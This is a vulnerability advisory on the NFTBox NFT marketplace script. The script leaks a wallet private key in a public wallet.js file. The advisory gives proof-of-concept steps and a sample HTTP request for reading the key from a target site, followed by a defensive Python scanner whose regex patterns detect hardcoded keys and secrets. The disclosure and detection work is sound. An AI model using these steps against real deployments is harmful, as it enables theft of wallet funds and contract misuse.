NFTBox NFT Marketplace Solution Private Key Disclosure
# Exploit Title: NFTBox - NFT Marketplace Solution - Hardcoded Private Key Disclosure
# Date: 2026-01-21
# Exploit Author: Sohel Yousef -- https://www.linkedin.com/in/sohel-yousef-50a905189/
# Vendor Homepage: https://bdtask.com/
# Software Link: https://codecanyon.net/item/nftbox-nft-marketplace-solution/35043063
# Version: Latest
# Tested on: Linux/Windows
# CVE: N/A
Description:
A critical information disclosure vulnerability exists in the 'NFTBox' script.
The application exposes a sensitive crypto wallet private key within a publicly served JavaScript file (`wallet.js`).
This allows a malicious actor to access the wallet's funds or interact with smart contracts on its behalf without authorization.
Vulnerable File:
/public/assets/website/js/wallet.js
Proof of Concept (PoC):
1. Navigate to the following path on the target application:
https://[TARGET-DOMAIN]/public/assets/website/js/wallet.js
2. Search for variable declarations related to wallet configuration (e.g., 'privateKey', 'secret').
3. The private key is visible in plain text.
Sample Request:
GET /public/assets/website/js/wallet.js HTTP/1.1
Host: [TARGET-DOMAIN]
Response (Snippet):
...
var privateKey = "0x123456..."; // SENSITIVE DATA EXPOSED
...
Impact:
Full compromise of the associated wallet, loss of funds, and unauthorized smart contract manipulation.
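The defensive counterpart of the PoC above is a pre-deployment check that fails the build if a browser-served asset contains a secret of this shape. The following is an added example written for this page, not code from NFTBox or its vendor; the sample `wallet.js` content and the key value in it are constructed placeholders. It flags two things: any quoted 32-byte hex literal (the length of an EVM private key, as opposed to a 20-byte address), and any string assigned to an identifier whose name suggests a secret.

```python
import re
from dataclasses import dataclass

# Identifier fragments that should never be assigned a literal in client-side code.
SENSITIVE_NAME_FRAGMENTS = ("privatekey", "private_key", "secret", "mnemonic", "seedphrase")

# Assignment (or object-key) of a string literal: captures identifier and value.
ASSIGN_RE = re.compile(r"""(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*[:=]\s*(['"])(.*?)\2""")

# 0x-prefixed 64 hex digits = 32 bytes, the length of an EVM private key.
# Addresses are 40 hex digits, so this pattern does not fire on contract addresses.
KEY32_RE = re.compile(r"^0x[0-9a-fA-F]{64}$")


@dataclass(frozen=True)
class Finding:
    line: int
    name: str
    reason: str


def scan_js(source: str) -> list[Finding]:
    """Return one Finding per suspicious literal assignment in a JS source text."""
    findings: list[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in ASSIGN_RE.finditer(line):
            name, value = match.group(1), match.group(3)
            if KEY32_RE.match(value):
                findings.append(Finding(lineno, name, "32-byte hex literal"))
            elif value and any(frag in name.lower() for frag in SENSITIVE_NAME_FRAGMENTS):
                findings.append(Finding(lineno, name, "sensitive identifier assigned a literal"))
    return findings


def has_browser_secret(source: str) -> bool:
    """True if the asset should be blocked from deployment."""
    return bool(scan_js(source))


# Constructed sample standing in for a public wallet.js; the key is a placeholder, not a real key.
FAKE_KEY = "0x" + "ab" * 32
SAMPLE_WALLET_JS = (
    'var rpcUrl = "https://rpc.example.invalid";\n'
    'var contractAddress = "0x' + "0" * 40 + '";\n'
    f'var privateKey = "{FAKE_KEY}"; // never belongs in a browser asset\n'
    "const apiSecret = 'sk_live_placeholder_0000';\n"
)

if __name__ == "__main__":
    for f in scan_js(SAMPLE_WALLET_JS):
        print(f"line {f.line}: {f.name} ({f.reason})")
```

Run this over the built `public/` tree in CI and treat any finding as a failed build. The only real fix for the class of issue in this advisory is architectural: anything that signs transactions has to stay on the server (or in the user's own wallet), and the browser bundle should only ever receive an address or a short-lived, server-issued signature.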
- Written by: khalil shreateh
- Category: Vulnerabilities